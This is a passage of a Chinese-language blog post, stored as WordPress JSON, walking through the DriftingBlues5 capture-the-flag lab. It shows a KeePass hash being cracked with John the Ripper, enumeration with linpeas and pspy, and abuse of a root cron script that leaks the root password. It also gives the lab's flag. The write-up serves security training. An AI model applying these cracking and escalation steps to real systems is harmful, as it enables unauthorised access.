a8\u548c\u7ba1\u7406\u7528\u6237\u7684\u5bc6\u7801\u4fe1\u606f\u3002<\/p>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/blog.csdn.net\/u012206617\/article\/details\/130964836\">https:\/\/blog.csdn.net\/u012206617\/article\/details\/130964836<\/a><\/p>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ keepass2john keyfile.kdbx &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues5]\n\u2514\u2500$ john hash -w=\/usr\/share\/wordlists\/rockyou.txt        \nUsing default input encoding: UTF-8\nLoaded 1 password hash (KeePass [SHA256 AES 32\/64])\nCost 1 (iteration count) is 60000 for all loaded hashes\nCost 2 (version) is 2 for all loaded hashes\nCost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nporsiempre       (keyfile)     \n1g 0:00:00:53 DONE (2024-04-11 03:18) 0.01869g\/s 128.7p\/s 128.7c\/s 128.7C\/s winston1..palomita\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p>\u7136\u540e\u5b89\u88c5\u4e00\u4e2a<code>keepass2<\/code><\/p>\n<pre><code class=\"language-bash\">sudo apt install keepass2<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555952.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555952.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411152246237\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">zakkwylde\nbuddyretard\n2read4surreal\ncloset313\nfracturedocean\nexalted<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u51e0\u4e2a\u5bc6\u7801\u5207\u6362root\uff0c\u4f46\u662f\u65e0\u679c\u3002<\/p>\n<h3>\u4e0a\u4f20linpeas.sh\u4e0epspy64<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555953.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555953.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411152712458\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555954.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555954.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411152852997\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555955.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111555955.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411153313123\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>what\uff1f\u8fd9\u73a9\u4e2a\u7403\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u6211\u4eec\u5728\u627e\u627e\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/tmp$ cd \/\n(remote) gill@driftingblues:\/$ ls -la\ntotal 69\ndrwxr-xr-x 19 root root  4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root  4096 Feb 24  2021 ..\nlrwxrwxrwx  1 root root     7 Dec 17  2020 bin -&gt; usr\/bin\ndrwxr-xr-x  3 root root  4096 Dec 17  2020 boot\ndrwxr-xr-x 17 root root  3260 Apr 11 01:28 dev\ndrwxr-xr-x 73 root root  4096 Apr 11 01:28 etc\ndrwxr-xr-x  3 root root  4096 Feb 24  2021 home\nlrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img -&gt; boot\/initrd.img-4.19.0-13-amd64\nlrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img.old -&gt; boot\/initrd.img-4.19.0-13-amd64\ndrwx---rwx  2 root root  4096 Feb 24  2021 keyfolder\nlrwxrwxrwx  1 root root     7 Dec 17  2020 lib -&gt; usr\/lib\nlrwxrwxrwx  1 root root     9 Dec 17  2020 lib32 -&gt; usr\/lib32\nlrwxrwxrwx  1 root root     9 Dec 17  2020 lib64 -&gt; usr\/lib64\nlrwxrwxrwx  1 root root    10 Dec 17  2020 libx32 -&gt; usr\/libx32\ndrwx------  2 root root 16384 Dec 17  2020 lost+found\ndrwxr-xr-x  3 root root  4096 Dec 17  2020 media\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 mnt\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 opt\ndr-xr-xr-x 94 root root     0 Apr 11 01:28 proc\ndrwx------  2 root root  4096 Feb 24  2021 root\ndrwxr-xr-x 18 root root   540 Apr 11 02:03 run\nlrwxrwxrwx  1 root root     8 Dec 17  2020 sbin -&gt; usr\/sbin\ndrwxr-xr-x  2 root root  4096 Dec 17  2020 srv\ndr-xr-xr-x 13 root root     0 Apr 11 01:28 sys\ndrwxrwxrwt  9 root root  1024 Apr 11 02:26 tmp\ndrwxr-xr-x 13 root root  4096 Dec 17  2020 usr\ndrwxr-xr-x 13 root root  4096 Dec 17  2020 var\nlrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz -&gt; boot\/vmlinuz-4.19.0-13-amd64\nlrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-13-amd64\n(remote) gill@driftingblues:\/$ cd \/opt;ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n(remote) gill@driftingblues:\/opt$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls -la\ntotal 8\ndrwx---rwx  2 root root 4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n(remote) gill@driftingblues:\/keyfolder$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) gill@driftingblues:\/keyfolder$ cd \/usr\/local\n(remote) gill@driftingblues:\/usr\/local$ ls -la\ntotal 40\ndrwxr-xr-x 10 root root 4096 Dec 17  2020 .\ndrwxr-xr-x 13 root root 4096 Dec 17  2020 ..\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 bin\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 etc\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 games\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 include\ndrwxr-xr-x  4 root root 4096 Dec 17  2020 lib\nlrwxrwxrwx  1 root root    9 Dec 17  2020 man -&gt; share\/man\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 sbin\ndrwxr-xr-x  4 root root 4096 Dec 17  2020 share\ndrwxr-xr-x  2 root root 4096 Dec 17  2020 src\n(remote) gill@driftingblues:\/usr\/local$ mail\n-bash: mail: command not found\n(remote) gill@driftingblues:\/usr\/local$ cd share\n(remote) gill@driftingblues:\/usr\/local\/share$ ls\nca-certificates  man\n(remote) gill@driftingblues:\/usr\/local\/share$ cd \/<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u8981\u627e\u5565\uff0c\u770b\u4e00\u4e0bwp\uff0c\u53d1\u73b0\u903b\u8f91\u53ef\u80fd\u662f\u68c0\u6d4b<code>keyfolder<\/code>\u662f\u5426\u5b58\u5728\u5bc6\u94a5\uff0c\u5982\u679c\u5b58\u5728\u7684\u8bdd\uff0c\u5c31\u628a\u5bc6\u7801\u4e22\u8fdb\u53bb\u3002\u3002<\/p>\n<p>\u5f97\u4e00\u4e2a\u4e00\u4e2a\u8bd5\uff0c\u53ea\u6709\u4e00\u4e2a\u5bc6\u7801\u662f\u6211\u4eec\u60f3\u8981\u7684\uff0c\u5c1d\u8bd5\u5168\u90e8\u521b\u5efa\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code>buddyretard\n2read4surreal\ncloset313\nfracturedocean\nexalted<\/code><\/pre>\n<p><code>zakkwylde<\/code>\u6211\u5df2\u7ecf\u8bd5\u8fc7\u4e86\uff0c\u4e0d\u884c\uff0c\u4e00\u8d77\u5168\u4f20\u4e0a\u53bb\u4e5f\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/$ cd keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ touch zakkwylde\n(remote) gill@driftingblues:\/keyfolder$ cd \/tmp\n(remote) gill@driftingblues:\/tmp$ .\/pspy64 \n........\n2024\/04\/11 02:45:37 CMD: UID=0    PID=1      | \/sbin\/init \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13906  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13907  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13908  | \/bin\/sh -c \/root\/key.sh \n2024\/04\/11 02:46:01 CMD: UID=0    PID=13909  | \/bin\/bash \/root\/key.sh \n2024\/04\/11 02:46:03 CMD: UID=0    PID=13910  | \n^CExiting program... (interrupt)\n(remote) gill@driftingblues:\/tmp$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls\nzakkwylde\n(remote) gill@driftingblues:\/keyfolder$ rm zakkwylde \n(remote) gill@driftingblues:\/keyfolder$ touch buddyretard\n(remote) gill@driftingblues:\/keyfolder$ touch 2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ touch closet313\n(remote) gill@driftingblues:\/keyfolder$ touch fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ touch exalted\n(remote) gill@driftingblues:\/keyfolder$ cd \/tmp;.\/pspy64\n........\n2024\/04\/11 02:47:49 CMD: UID=0    PID=1      | \/sbin\/init \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13964  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13965  | \/usr\/sbin\/CRON -f \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13966  | \/bin\/sh -c \/root\/key.sh \n2024\/04\/11 02:48:01 CMD: UID=0    PID=13967  | \/bin\/bash \/root\/key.sh \n^CExiting program... (interrupt)\n(remote) gill@driftingblues:\/tmp$ cd \/keyfolder\/\n(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal  buddyretard  closet313  exalted  fracturedocean<\/code><\/pre>\n<p>\u90a3\u53ea\u80fd\u4e00\u4e2a\u4e00\u4e2a\u6765\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal  buddyretard  closet313  exalted  fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ rm 2read4surreal buddyretard closet313 exalted \n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ rm fracturedocean \n(remote) gill@driftingblues:\/keyfolder$ touch buddyretard\n(remote) gill@driftingblues:\/keyfolder$ ls\nbuddyretard\n(remote) gill@driftingblues:\/keyfolder$ ls\nbuddyretard\n(remote) gill@driftingblues:\/keyfolder$ rm buddyretard \n(remote) gill@driftingblues:\/keyfolder$ touch 2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ ls\n2read4surreal\n(remote) gill@driftingblues:\/keyfolder$ rm 2read4surreal \n(remote) gill@driftingblues:\/keyfolder$ touch closet313\n(remote) gill@driftingblues:\/keyfolder$ ls\ncloset313\n(remote) gill@driftingblues:\/keyfolder$ ls\ncloset313\n(remote) gill@driftingblues:\/keyfolder$ rm closet313 \n(remote) gill@driftingblues:\/keyfolder$ touch fracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean\n(remote) gill@driftingblues:\/keyfolder$ ls\nfracturedocean  rootcreds.txt\n(remote) gill@driftingblues:\/keyfolder$ cat rootcreds.txt \nroot creds\n\nimjustdrifting31\n(remote) gill@driftingblues:\/keyfolder$ su root\nPassword: \nroot@driftingblues:\/keyfolder# cd \/root\nroot@driftingblues:~# ls -la\ntotal 20\ndrwx------  2 root root 4096 Feb 24  2021 .\ndrwxr-xr-x 19 root root 4096 Feb 24  2021 ..\n-rw-------  1 root root   61 Feb 24  2021 .bash_history\n-rwx------  1 root root  205 Feb 24  2021 key.sh\n-r-x------  1 root root   32 Feb 24  2021 root.txt\nroot@driftingblues:~# cat root.txt \n9EFF53317826250071574B4D4EE56840root@driftingblues:~# cat key.sh \n#!\/bin\/bash\n\nif [[ $(ls \/keyfolder) == &quot;fracturedocean&quot; ]]; then\n        echo &quot;root creds&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\n        echo &quot;&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\n        echo &quot;imjustdrifting31&quot; &gt;&gt; \/keyfolder\/rootcreds.txt\nfi\nroot@driftingblues:~# cat .bash_history \ncd \/\nls -la\ncd \/root\/\n.\/logdel2 \nrm logdel2 \nshutdown -h now<\/code><\/pre>\n<p>\u62ff\u5230flag\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues5 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV 172.20.10.4 PORT STA [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-528","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=528"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528\/revisions"}],"predecessor-version":[{"id":529,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/528\/revisions\/529"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=528"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}